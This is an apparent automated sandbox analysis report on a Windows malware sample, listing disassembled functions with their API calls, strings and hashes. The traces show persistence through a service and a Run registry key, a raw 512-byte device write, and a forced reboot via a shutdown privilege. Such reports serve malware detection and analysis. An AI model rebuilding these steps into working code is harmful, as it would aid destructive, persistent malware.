                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$strlen$FileOpenstrcat$ChangeConfig2CreateDatabaseStartstrcpy$AttributesCopyDirectoryEnvironmentErrorExpandLastLockManagerModuleNameStringsUnlockValue_accesslstrlenmemsetstrncmpwsprintf
                                                                    • String ID: %$%ProgramFiles%\$Description$Dhttdfv.exe$Rsjshd fzfgkqcm$SYSTEM\CurrentControlSet\Services\$\$s
                                                                    • API String ID: 3757774263-1935338918
                                                                    • Opcode ID: 01eca40504263f1132f5f6e331a13b7c5b0fa288b6d049b7c33866324f32549b
                                                                    • Instruction ID: 4802be21e15c6790a195652bbc467ed91045842eea411fe39eef3066dbc81b5d
                                                                    • Opcode Fuzzy Hash: 01eca40504263f1132f5f6e331a13b7c5b0fa288b6d049b7c33866324f32549b
                                                                    • Instruction Fuzzy Hash: 7F81CDB180026CAFEB21DF94CC89EDABBBCFB09640F4045EAF609A2155D7749B94CF51
                                                                    Function 10001503 Relevance: 59.6, APIs: 14, Strings: 20, Instructions: 121filesleepshutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,100145A0,00000001), ref: 10001534
                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000159F
                                                                    • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 100015C6
                                                                    • WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 100015DA
                                                                    • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 100015EF
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100015F2
                                                                    • Sleep.KERNEL32(000007D0), ref: 100015FD
                                                                    • GetVersion.KERNEL32 ref: 10001603
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 10001617
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 1000161E
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 1000162E
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 1000164D
                                                                    • ExitWindowsEx.USER32(00000006,00000000), ref: 10001656
                                                                    • exit.MSVCRT ref: 1000165D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ControlDeviceFileProcessToken$AdjustCloseCreateCurrentExitHandleLookupOpenPrivilegePrivilegesSleepValueVersionWindowsWriteexitmemcpy
                                                                    • String ID: .$0$A$C$D$E$H$I$I$L$P$R$S$SeShutdownPrivilege$U$V$Y$\$\$\
                                                                    • API String ID: 4093840555-1807105605
                                                                    • Opcode ID: ca68aad574e8622a45233f099ca570715badae249df225ca9196920a04f0dc22
                                                                    • Instruction ID: e1ef4f8c5b2394e99dc06edf204db353c7ef66d7161cebdd5f6de16399095a1f
                                                                    • Opcode Fuzzy Hash: ca68aad574e8622a45233f099ca570715badae249df225ca9196920a04f0dc22
                                                                    • Instruction Fuzzy Hash: 324130B180829CFEFB0197A4CC89FEF7E7CAB15389F044095F655A6182C7B94E088B75
                                                                    Function 00411ACF Relevance: 56.2, APIs: 28, Strings: 4, Instructions: 214stringserviceregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,Rsjshd fzfgkqcm,1000C2E0,00000000), ref: 00411B05
                                                                    • ExpandEnvironmentStringsA.KERNEL32(100131B8,?,00000104), ref: 00411B18
                                                                    • strlen.MSVCRT ref: 00411B25
                                                                    • strncmp.MSVCRT ref: 00411B39
                                                                    • wsprintfA.USER32 ref: 00411B7F
                                                                    • strlen.MSVCRT ref: 00411B8C
                                                                    • strlen.MSVCRT ref: 00411BA5
                                                                    • _mbscat.MSVCRT ref: 00411BBE
                                                                    • _mbscat.MSVCRT ref: 00411BD1
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 00411BE8
                                                                    • memset.MSVCRT ref: 00411C03
                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000104,?), ref: 00411C16
                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00411C2D
                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00411C4F
                                                                    • CreateServiceA.ADVAPI32(00000000,10013038,?,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00411C88
                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 00411C95
                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000001,Rsjshd fzfgkqcm), ref: 00411CB9
                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 00411D34
                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 00411D40
                                                                    • GetLastError.KERNEL32 ref: 00411D4E
                                                                    • OpenServiceA.ADVAPI32(?,10013038,000F01FF), ref: 00411D69
                                                                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00411D7C
                                                                    • StartServiceA.ADVAPI32(?,00000000,00000000), ref: 00411D8A
                                                                    • _mbscpy.MSVCRT(?,10013F48), ref: 00411DA0
                                                                    • _mbscat.MSVCRT ref: 00411DAF
                                                                      • Part of subcall function 00410BAA: strlen.MSVCRT ref: 00410BD2
                                                                      • Part of subcall function 00410BAA: _access.MSVCRT ref: 00410BF9
                                                                      • Part of subcall function 00410BAA: CreateDirectoryA.KERNEL32(?,00000000), ref: 00410C10
                                                                      • Part of subcall function 00410BAA: strlen.MSVCRT ref: 00410C18
                                                                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00411DCA
                                                                    • lstrlen.KERNEL32(00411809), ref: 00411DD3
                                                                    • RegSetValueExA.ADVAPI32(?,10013F3C,00000000,00000001,00411809,00000000), ref: 00411DEA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$strlen$FileOpen_mbscat$ChangeConfig2CreateDatabaseStart_mbscpy$AttributesCopyDirectoryEnvironmentErrorExpandLastLockManagerModuleNameStringsUnlockValue_accesslstrlenmemsetstrncmpwsprintf
                                                                    • String ID: %$Rsjshd fzfgkqcm$\$s
                                                                    • API String ID: 2753262143-2137445856
                                                                    • Opcode ID: 1a164b2253530368cbfa9980f9aac64b4eeb3e7e9e095d432233d9937d35876a
                                                                    • Instruction ID: b8906f91a9fa5c7d0cebef24898c3ac72a118a4adacd4eeca1440459578dc4ae
                                                                    • Opcode Fuzzy Hash: 1a164b2253530368cbfa9980f9aac64b4eeb3e7e9e095d432233d9937d35876a
                                                                    • Instruction Fuzzy Hash: 5781CCB180026CABDB229F94DC89EDABBBCFB08744F4444EAF609E2151D7749B94CF54
                                                                    Function 0040954F Relevance: 56.1, APIs: 12, Strings: 20, Instructions: 121filesleepshutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,100145A0,00000001), ref: 00409580
                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 004095EB
                                                                    • WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00409626
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040963E
                                                                    • Sleep.KERNEL32(000007D0), ref: 00409649
                                                                    • GetVersion.KERNEL32 ref: 0040964F
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00409663
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040966A
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,10012038,?), ref: 0040967A
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00409699
                                                                    • ExitWindowsEx.USER32(00000006,00000000), ref: 004096A2
                                                                    • exit.MSVCRT ref: 004096A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileProcessToken$AdjustCloseCreateCurrentExitHandleLookupOpenPrivilegePrivilegesSleepValueVersionWindowsWriteexitmemcpy
                                                                    • String ID: .$0$A$C$D$E$H$I$I$L$P$R$S$SeShutdownPrivilege$U$V$Y$\$\$\
                                                                    • API String ID: 2514494162-1807105605
                                                                    • Opcode ID: eb2849e64336eebdac97a16cf0d763112d11adcce26e973367d915f6ba5464be
                                                                    • Instruction ID: 457228d4055dc80ddf074a706b31d143ccccf3617fbd5fa182cf65f74fecd903
                                                                    • Opcode Fuzzy Hash: eb2849e64336eebdac97a16cf0d763112d11adcce26e973367d915f6ba5464be
                                                                    • Instruction Fuzzy Hash: DF4110B180829CFEFB0197A4CC99FEF7E7C9B15349F044095F655A6182C7B94E088B75
                                                                    Function 10005F59 Relevance: 40.8, APIs: 19, Strings: 4, Instructions: 575registrymemorysleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,Function_0000502A,?,00000000,00000000,00000001,?,?,?,?,Function_00005239,?,00000000), ref: 10006079
                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 10006090
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 1000616D
                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 10006184
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100061A9
                                                                    • wsprintfA.USER32 ref: 100062B4
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,rsion\Run), ref: 100062D0
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100062EB
                                                                    • RegSetValueExA.ADVAPI32(rsion\Run,?,00000000,00000001,?,00000000), ref: 10006306
                                                                    • RegCloseKey.ADVAPI32(00000072), ref: 10006311
                                                                    • Sleep.KERNEL32(00000000), ref: 10006320
                                                                    • memset.MSVCRT ref: 10006375
                                                                    • memcpy.MSVCRT(?,?,000005F4,?,00000000,000005F4), ref: 10006388
                                                                    • OutputDebugStringA.KERNEL32(?), ref: 10006397
                                                                    • GetVersionExA.KERNEL32(?), ref: 100064E1
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 100066A8
                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 100066BB
                                                                    • strcpy.MSVCRT(?,00000000), ref: 10006711
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 10006717
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$AllocVirtual$FileModuleName$??3@CloseDebugOpenOutputSleepStringValueVersionmemsetstrcpywsprintf
                                                                    • String ID: %c%c%c%c%c%c$Rsjshd fzfgkqcm$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$rsion\Run
                                                                    • API String ID: 3125802572-371884834
                                                                    • Opcode ID: 014e1a74b99de1fcdf98ede77bdfc152f10749523a94f3daacbd89ef24d7045f
                                                                    • Instruction ID: 001f7eab40b8c1efd8fb61ea1c58bdaa5a143593c0ae2d8cc968a69052e087b5
                                                                    • Opcode Fuzzy Hash: 014e1a74b99de1fcdf98ede77bdfc152f10749523a94f3daacbd89ef24d7045f
                                                                    • Instruction Fuzzy Hash: 6D22B071D04259AEFF21CBA0CC89FEFBBBEEB0A384F144095F14865055CB765A94CB62
                                                                    Function 0040FC42 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 219registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040FC5D
                                                                      • Part of subcall function 0040F2D5: lstrcpy.KERNEL32(?,10013484), ref: 0040F33A
                                                                    • memset.MSVCRT ref: 0040FCD2
                                                                    • getsockname.WS2_32(?,?,?), ref: 0040FCEB
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0040FD00
                                                                    • memcpy.MSVCRT(?,?,00000032,?,?,00000004), ref: 0040FD15
                                                                    • GetVersionExA.KERNEL32(?), ref: 0040FD2E
                                                                    • RegOpenKeyA.ADVAPI32(80000002,10013D98,?), ref: 0040FD65
                                                                    • RegQueryValueExA.ADVAPI32(?,10013D90,00000000,?,?,?), ref: 0040FD80
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040FD89
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0040FDFB
                                                                    • GetDriveTypeA.KERNEL32(?), ref: 0040FE36
                                                                    • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?), ref: 0040FE51
                                                                    • memset.MSVCRT ref: 0040FEA2
                                                                    • GetLastInputInfo.USER32(?), ref: 0040FEC8
                                                                    • GetTickCount.KERNEL32 ref: 0040FECE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$memcpy$CloseCountDiskDriveFreeGlobalInfoInputLastMemoryOpenQuerySpaceStatusTickTypeValueVersiongetsocknamelstrcpy
                                                                    • String ID: :$@$Default$Rsjshd fzfgkqcm$V10.0 Pro$\
                                                                    • API String ID: 1232973178-280790721
                                                                    • Opcode ID: b0de46014619328ea4046d2ff91efce593752122d7313dd730b3ce67eee27348
                                                                    • Instruction ID: 71f1d9a426fcb670f4f5ca0ae33ac1a73810843bf670ae4046250e5d3a30475d
                                                                    • Opcode Fuzzy Hash: b0de46014619328ea4046d2ff91efce593752122d7313dd730b3ce67eee27348
                                                                    • Instruction Fuzzy Hash: 0181DEB2D0122CABDB21DBA5DD89FDEB7BCAB04355F4041A6E508F3181D7749A88CF64
                                                                    Function 00410AA0 Relevance: 36.8, APIs: 5, Strings: 16, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 00410AA6
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00410AB3
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00410B10
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00410B33
                                                                    • CloseHandle.KERNEL32(?), ref: 00410B3C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                    • String ID: D$P$S$b$e$e$e$e$g$g$i$i$l$r$u$v
                                                                    • API String ID: 3038321057-1035330691
                                                                    • Opcode ID: 1f8af41a29dc6ba370d3ea4e38587daa48d96f7a611b70922b13c76158938810
                                                                    • Instruction ID: 8ef02c6428b305f39a105f81569b4b49d32ba9c36380e36ffe8469dbe40ef7e7
                                                                    • Opcode Fuzzy Hash: 1f8af41a29dc6ba370d3ea4e38587daa48d96f7a611b70922b13c76158938810
                                                                    • Instruction Fuzzy Hash: 9B21F1609082CDDEFF01CBE8C848BEFBFB99B15749F180088D14576292D7BA5A58C776
                                                                    Function 10008A54 Relevance: 36.8, APIs: 5, Strings: 16, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 10008A5A
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 10008A67
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10008AC4
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 10008AE7
                                                                    • CloseHandle.KERNEL32(?), ref: 10008AF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                    • String ID: D$P$S$b$e$e$e$e$g$g$i$i$l$r$u$v
                                                                    • API String ID: 3038321057-1035330691
                                                                    • Opcode ID: 1f8af41a29dc6ba370d3ea4e38587daa48d96f7a611b70922b13c76158938810
                                                                    • Instruction ID: 1b422eb70a6b503645a6854424b1df98c394f0022e88ccbf2a13525e0ae78bc9
                                                                    • Opcode Fuzzy Hash: 1f8af41a29dc6ba370d3ea4e38587daa48d96f7a611b70922b13c76158938810
                                                                    • Instruction Fuzzy Hash: 2C21F1609082CDDEFB01CBE8C848BEFBFB9AB16749F140048D18576192D7BA4A58C776
                                                                    Function 0040DED2 Relevance: 35.0, APIs: 7, Strings: 13, Instructions: 42servicefilestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 0040DEE1
                                                                    • OpenServiceA.ADVAPI32(00000000,10012FD4,000F01FF), ref: 0040DEF2
                                                                    • DeleteService.ADVAPI32(00000000), ref: 0040DEF9
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040DF0B
                                                                    • lstrcat.KERNEL32(?,?), ref: 0040DF50
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040DF5D
                                                                    • exit.MSVCRT ref: 0040DF65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
